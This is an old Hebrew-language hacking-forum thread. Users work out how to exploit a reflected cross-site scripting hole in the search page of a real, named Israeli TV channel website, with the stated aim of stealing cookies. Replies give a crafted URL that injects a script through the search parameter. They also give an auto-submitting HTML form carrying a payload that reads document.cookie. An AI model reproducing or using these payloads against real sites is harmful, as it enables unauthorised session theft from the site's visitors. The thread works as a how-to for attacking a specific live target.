02/08/2006 17:37:44
devil kide
אנשים, יש לי שאלה קטנה, נקווה שתצליחו לעזור.
תקשיבו, בשביל שיהיה XSS באתר, יענו כדי לגנוב עוגיות אחנו צריכים שתהיה אפשרות כזאת למשל (בחיפוש): קוד:blabla.com?var=<script>....</script> או שזה ישמר בתוך מסד, או משהו כזה.
עכשיו תראו מה מצאתי כאן: http://www.shesh.co.il/forums/search.asp?forumId=8 (אל תשאלו מה אני מחפש באתר של ערוץ שש )
תכניסו לחיפוש(החיפוש נמצא באמצע הדף, לפני איפה שהוא מציג את כל הדפים) איזה שהוא סקריפט,הוא ירוץ, אבל אין לי אפשרות דרך ה get להעביר את זה, בקיצור, זה בר ניצול?[ההודעה נערכה על-ידי devil kide ב-02/08/2006 17:42:02]
02/08/2006 18:11:26
Ratinho
אם יש משהו כגון fat.php?abc="hiii" ואז נכתב hiii אז זה בר ניצול, אבל אם זה לפי ID זה לא הכי בר ניצול..
02/08/2006 18:57:25
devil kide
ציטוט:אם יש משהו כגון fat.php?abc="hiii" ואז נכתב hiii אז זה בר ניצול, אבל אם זה לפי ID זה לא הכי בר ניצול..
לא התכוונתי לנצל את מה שנכנס ל Id, אלא לנסות לנצל את תוצאות החיפוש. תכתוב סקריפט בחיפוש ותבין.
02/08/2006 21:46:58
MasterBlaster
ציטוט:ציטוט:אם יש משהו כגון fat.php?abc="hiii" ואז נכתב hiii אז זה בר ניצול, אבל אם זה לפי ID זה לא הכי בר ניצול..
לא התכוונתי לנצל את מה שנכנס ל Id, אלא לנסות לנצל את תוצאות החיפוש. תכתוב סקריפט בחיפוש ותבין. עקרונית זה פגיע. אם למשל תכניס את ערך החיפוש הבא:
קוד:<script> alert (’XSS’); </script>
אז ה-alert יתבצע. הבעיה היא שפרמטר החיפוש לא מועבר דרך ה-URL (הטופס נשלח ב-Post ולא ב-Get), ככה שמעשית החור הזה הוא לא בר ניצול (אבל אם זה מה שמדאיג אותך - אני מניח שיש להם עוד מיליון חורים אחרים, לא בעיה למצוא).
עריכה: טעות, שלי, זה כן בר ניצול. שים לב שהשם של הפרמטר זה search. עכשיו כל מה שנשאר לך לעשות זה להוסיף אותו ידנית לתוך ה-URL, למשל:
http://www.shesh.co.il/forums/search.asp?forumId=13&search=<script> alert (XSS’); </script>[ההודעה נערכה על-ידי MasterBlaster ב-02/08/2006 21:57:35]
02/08/2006 21:56:08
Ratinho
ואם אתה עורך את הPOST? כמו למשל בmini browser?
03/08/2006 02:03:05
SkOd
שמור את זה כדף HTML ותעלה את זה לאן שהוא: קוד: <form action="http://www.shesh.co.il/forums/search.asp?pageNo=1&forumId=1" method="post" name="xss"> <input type="hidden" name="search" value="<script>alert(’Cookie: ’+document.cookie+’\nLocation: ’+document.location);</script>"> </form> <body onload="document.xss.submit();">
עמודים:
1